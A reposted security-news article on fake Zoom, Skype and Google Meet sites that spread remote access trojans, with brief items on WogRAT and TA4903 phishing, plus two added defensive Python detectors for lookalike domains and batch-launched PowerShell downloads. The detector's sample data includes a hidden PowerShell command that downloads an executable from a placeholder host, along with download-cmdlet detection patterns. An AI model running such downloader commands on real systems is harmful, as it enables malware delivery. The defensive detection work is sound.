Watch out: spoofed Zoom, Skype and Google Meet websites may spread malware

admin  10 March 2024 11:42:07  17 views  4,291 characters  reading time 14 min 18 s


Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.


"The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems," Zscaler ThreatLabz researchers said.


The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.

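The typosquatting described above is something a defender can screen for in new-domain feeds, proxy logs or certificate-transparency output. The Python below is an added example and is not code from the original article or from Zscaler; the brand allow-list and the candidate hostnames it checks are constructed for illustration and are not indicators from the campaign.

```python
"""Screen hostnames for lookalikes of legitimate video-conferencing domains.

Added example (not from the original article). The candidate hostnames below
are constructed for illustration and are not indicators from the campaign.
"""

# Brand keyword -> the legitimate registrable domain it belongs to (assumption:
# this short allow-list is enough for the brands named in the report).
BRANDS = {"zoom": "zoom.us", "skype": "skype.com", "google": "google.com"}

# Digits commonly substituted for letters in lookalike names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

# Constructed sample input: a mix of legitimate, lookalike and unrelated hosts.
CANDIDATES = [
    "meet.google.com",      # legitimate subdomain
    "zoom.us",              # legitimate
    "zo0m.us",              # digit-for-letter substitution
    "skypee.com",           # extra character
    "skype-download.info",  # brand keyword plus a lure word
    "goog1e.com",           # digit-for-letter substitution
    "example.org",          # unrelated
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (classic dynamic-programming form)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def second_level_label(host: str) -> str:
    """'zo0m.us' -> 'zo0m': the label where a lookalike brand name is placed."""
    parts = host.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(host: str, max_distance: int = 1):
    """Return (verdict, brand). Verdicts: legitimate, lookalike, brand-keyword, unrelated."""
    host = host.lower().strip(".")
    # Exact match or a subdomain of the legitimate domain is fine.
    for brand, legit in BRANDS.items():
        if host == legit or host.endswith("." + legit):
            return ("legitimate", brand)
    label = second_level_label(host)
    normalized = label.translate(HOMOGLYPHS)
    for brand in BRANDS:
        # Close edit distance, before or after undoing digit substitutions.
        if min(levenshtein(label, brand), levenshtein(normalized, brand)) <= max_distance:
            return ("lookalike", brand)
        # Brand name embedded in a longer label ("skype-download").
        if brand in normalized:
            return ("brand-keyword", brand)
    return ("unrelated", None)


def scan(hosts=CANDIDATES):
    """Classify each host, returning only those worth an analyst's attention."""
    return [(h, *classify(h)) for h in hosts if classify(h)[0] != "legitimate"]


if __name__ == "__main__":
    for host, verdict, brand in scan():
        print(f"{host:24} {verdict:14} {brand}")
```

The edit-distance threshold of 1 keeps the rule tight; raising it to 2 catches more variants but starts matching unrelated short labels, so in practice the output is best treated as a triage list rather than a block list.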

They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.


The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.

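The batch-script-to-PowerShell download chain described above leaves a recognisable parent/child pattern in process-creation telemetry (Sysmon event 1 or EDR equivalents). The Python below is an added example, not code from the article or from the researchers; the events it scans are constructed sample records with invented pids and paths, and `example.invalid` is a placeholder host.

```python
"""Flag the batch-script -> PowerShell -> download chain in process telemetry.

Added example (not from the article or the researchers). The events below are
constructed sample process-creation records with invented pids and paths;
example.invalid is a placeholder host.
"""
import re

# Command-line fragments that fetch content from the network in PowerShell.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer",
    re.I,
)
# -e / -enc / -EncodedCommand: script body hidden behind base64.
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s", re.I)
BATCH_RE = re.compile(r"\.(?:bat|cmd)\b", re.I)

# Constructed process-creation events (ppid -> pid links the process tree).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Suspicious chain: batch file from Downloads launches a hidden PowerShell downloader.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\meeting-app.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command '
                r'"Invoke-WebRequest -Uri http://example.invalid/update -OutFile $env:TEMP\update.exe"'},
    # Benign chain: build script runs a local PowerShell file, no network fetch.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c build.bat"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File build.ps1"},
    # Download from an interactive shell: not the batch-launched pattern this rule targets.
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Invoke-WebRequest -Uri https://example.invalid/tools.zip -OutFile tools.zip"},
]


def is_batch_launch(ev):
    """cmd.exe whose command line references a .bat/.cmd file."""
    return ev["image"].lower().endswith("cmd.exe") and BATCH_RE.search(ev["cmdline"]) is not None


def is_powershell(ev):
    return ev["image"].lower().endswith(("powershell.exe", "pwsh.exe"))


def find_batch_to_powershell_downloads(events):
    """Return one finding per PowerShell process that was spawned by a batch script
    and whose command line fetches from the network or hides an encoded script."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if not is_powershell(ev):
            continue
        parent = by_pid.get(ev["ppid"])
        if parent is None or not is_batch_launch(parent):
            continue
        reasons = []
        if DOWNLOAD_RE.search(ev["cmdline"]):
            reasons.append("network download cmdlet")
        if ENCODED_RE.search(ev["cmdline"]):
            reasons.append("encoded command")
        if reasons:
            findings.append({"pid": ev["pid"], "parent_pid": parent["pid"],
                             "batch_cmdline": parent["cmdline"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_batch_to_powershell_downloads(SAMPLE_EVENTS):
        print(f"pid {f['pid']} (parent {f['parent_pid']}): {', '.join(f['reasons'])}")
```

Keying the rule on the parent being a batch launch, rather than on any PowerShell download, is what keeps the interactive download (pid 600) and the build script (pid 500) out of the findings; adding the parent's command line to the finding lets an analyst see immediately which file the user ran.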

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.


"A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files," the researchers said.


The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.



It's said to be active from at least late 2022, targeting Asian countries like China, Hong Kong, Japan, and Singapore, among others. That said, it's currently not known how the malware is distributed in the wild.


"When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server," ASEC said. "The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files."


It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activities intensifying post mid-2023.


"TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials," Proofpoint said. "The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others."


Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.


Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.


Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.


References

[1]https://thehackernews.com/2024/03/watch-out-for-spoofed-zoom-skype-google.html


Originally published on the WeChat public account 知机安全 under the title: Watch out: spoofed Zoom, Skype and Google Meet websites may spread malware

Posted by admin on 10 March 2024 11:42:07. Please keep this link when reprinting (CN-SEC: thanks to the original author): http://cn-sec.com/archives/2558722.html
